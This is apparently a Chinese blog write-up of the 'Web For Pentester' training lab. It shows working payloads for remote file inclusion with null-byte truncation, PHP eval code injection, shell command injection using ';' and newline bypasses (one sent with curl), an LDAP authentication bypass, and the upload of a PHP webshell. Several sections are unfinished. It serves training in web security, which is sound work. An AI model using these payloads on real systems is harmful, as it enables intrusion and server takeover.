Web For Pentester File include
File include(文件包含)
Example 1 没有任何过滤
审计源码
没有对我们传参的page
进行任何过滤,payload如下
http://172.16.1.104/fileincl/example1.php?page=http://172.16.1.102/info.txt
本机info.txt
内容
Example 2 00截断
审计源码
在传参的page
后面加入了.php
,使用正则对00
后面进行过滤为空
这里可以使用PHP 00截断
,payload如下
http://172.16.1.104/fileincl/example2.php?page=http://172.16.1.102/info.txt%00
执行成功
code injection(代码注入)
php危险函数,代码注入
Example 1 绕过拼接
审计代码
直接将name
进行传参,然后使用Hello name !!!
进行拼接,最后使用eval
函数执行php函数
eval函数是一个php中很危险的函数,可以直接调用php代码执行
这里虽然对我们的输入进行了拼接,但是可以进行闭合,payload如下
name=";system('whoami');//
现将前面的"
进行闭合,然后使用;
代表这句php代码的结束,执行system
函数调用系统命令whomai
,;
代表system
函数执行完毕,最后使用//
将本行后面的内容注释
Example 2
审计源码
由于没有学过php
,这里看不太懂,留下一个坑,接下来就命令执行吧
Commands injection(命令执行)
Example 1 没有过滤
审计源码
通过systme()
函数执行ping -c 2
探测主机存活两次,没有对ip
传参进行过滤
这里运用了Linux
的特性; & && | ||
,这些特殊字符都可以进行绕过
payload
ip=127.0.0.;whoami
Example 2 换行绕过
审计源码
使用正则匹配开头和结束
,如果不是ip地址格式
直接输出Invalid IP address
,但是这里使用了/m
换行匹配
使用%0a
换行符绕过,payload如下
ip=127.0.0.1%0Aip a
成功执行
Example 3 跳转
审计源码
去掉了/m
换行匹配,匹配如果ip不满足IP地址条件
跳转到example3?ip=127.0.0.1
页面
这里我们输入的命令是被执行过得,因为代码是一直往下执行的,只是跳转并没有回显执行成功页面
使用burpsuite抓包进行查看
curl可以实现
curl "http://172.16.1.104/commandexec/example3.php?ip=127.0.0.1;whoami"
执行成功
LDAP attacks(轻目录访问协议)
LDAP 是一个基于x.500
标准的轻量目录访问协议。可以把它看做数据库,就像我们电脑的目录结构一样,可以快速的查询、搜索、浏览数据,和数据不同的就是它修改数据很麻烦,LDAP
就是为了查询数据而生的
Example 1 空认证
查询当然时候密码认证的啦
审计源码
这里很像数据库认证的页面,验证我们的用户名和密码是否在LDAP
数据库中
直接点击进行访问
用户名和密码为hacker
,由于一些LDAP
是空绑定的,就是没有进行认证设置,所以我们提交空的密码
username
,password
改为空的进行提交
还是不可以登录
那么我们直接将传参清除,进行提交
/example1.php
认证成功
Example 2 类似SQL注入的认证
审计源码
这个类似于SQL
注入,就如以下代码
先通过md5
加密了password
,所以不能对password
进行注入,但是我们可以对name
进行闭合
所以可以构造payload进行闭合
name=hacker))%00&password=任意
测试
认证成功
File Upload(文件上传)
Example 1 没有过滤的上传
审计源码
没有进行任何过滤,直接将文件进行上传
上传一句话木马
上传成功后,提示我们上传的文件在here
点击访问backdoor.php
没有任何回显,因为是一句话木马,使用蚁剑
进行连接
可以看到测试连接成功,直接添加,添加后 右键 -> 虚拟终端
就可以连接靶机命令行
Example 2 大小写绕过
审计源码
使用正则进行匹配结束php
的黑名单,由于这里靶机使用的环境是php
,所以上传asp
是没有用的
但是这里检测的的后缀名是小写的php
,可是使用大小写绕过
上传成功
XML attacks (XML攻击)
Example 1
审计源码
Example 2
审计源码
Web For Pentester File include的更多相关文章
- Web for pentester_writeup之File Include篇
Web for pentester_writeup之File Include篇 File Include(文件包涵) Example 1 加一个单引号 从报错中我们可以获取如下信息: 当前文件执行的代 ...
- ERROR: “System.Web.Mvc.Controller.File(string, string, string)”是一个“方法”
ERROR: “System.Web.Mvc.Controller.File(string, string, string)”是一个“方法”,这在给定的上下文中无效 这是一个与Controller.F ...
- 【渗透测试学习平台】 web for pentester -2.SQL注入
Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/e ...
- 【渗透测试学习平台】 web for pentester -1.介绍与安装
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址: ...
- Web For Pentester靶场(xss部分)
配置 官网:https://pentesterlab.com/ 下载地址:https://isos.pentesterlab.com/web_for_pentester_i386.iso 安装方法:虚 ...
- Express web框架 upload file
哈哈,敢开源,还是要有两把刷子的啊 今天,看看node.js 的web框架 Express的实际应用 //demo1 upload file <html><head><t ...
- 【渗透测试学习平台】 web for pentester -4.XML
example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%2 ...
- 【渗透测试学习平台】 web for pentester -8.XML
example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%2 ...
- 【渗透测试学习平台】 web for pentester -7.文件包含
Example 1 输入单引号,报错,得到物理路径 可通过../../../../etc/paaswd 读取敏感信息 可包含本地文件或远程文件 https://assets.pentesterlab. ...
- 【渗透测试学习平台】 web for pentester -4.目录遍历
Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 ...
随机推荐
- 实验: spring-boot 整合 fluent-mybatis 实验过程!!!!
1.参考: 简单整合,会报错误 https://segmentfault.com/a/1190000040467885?utm_source=sf-similar-article 利用maven编译, ...
- 「SOL」数树 (LOJ/WC2019)
WC 果然还是 WC # 题面 有一张 \(n\) 个点的图,图上有红蓝两种边(可能重叠),且两种边各自形成一个 \(n\) 个点的树. 用 \(m\) 种颜色给图上的所有点染色.若 \(u,v\) ...
- 显式等待(一)WebDriverWait类、until()方法
转自: https://blog.csdn.net/zyooooxie/article/details/84422924
- AX2012 日期时间格式化
public static str DateTimeFormatStr(utcDateTime _dateTime, str _format = '{0:yyyy-MM-dd HH:mm:ss}') ...
- 项目引入fastclick 导致ios中input需要多次点击才能触发focus
main.js中引入之后的修改 import FastClick from "fastclick"; FastClick.prototype.focus = function (t ...
- VS2019创建WebAPI,本地发布WebAPI
一.创建WebAPI 1.打开VS2019->创建新项目 2.ASP.NET Web应用程序->下一步 3.注意:.NET Framework版本必须高于4.0以上 4.选择"W ...
- Linux目录结构说明与基本操作
Linux系统目录如下: 详细说明如下: Linux系统文件与目录的基本操作: 一.显示文件内容命令--cat.more.less.head.tail. 1.cat命令 该命令的主要功能是用来显示文件 ...
- vue-封装组件-结合vant实现点击按钮弹出泡泡(Popover)事件控制多个泡泡出现时,弹出对应的泡泡
<template> <div class="sale-share-box"> <span class="sale-share-btn&qu ...
- cesium 入门指南
最近拿到了几份offer,经过这次找工作发现自己最近脱节挺严重,为了后续的职业发展,决定开始书写博客记录自己的努力. cesium属于 跨平台.跨浏览器的展现三维地球.地图的JavaScript库. ...
- Docker安装(win10)
Docker安装 windows 首先开启Hyper-V Hyper-V 是微软开发的虚拟机,类似于 VMWare 或 VirtualBox,仅适用于 Windows 10.这是 Docker Des ...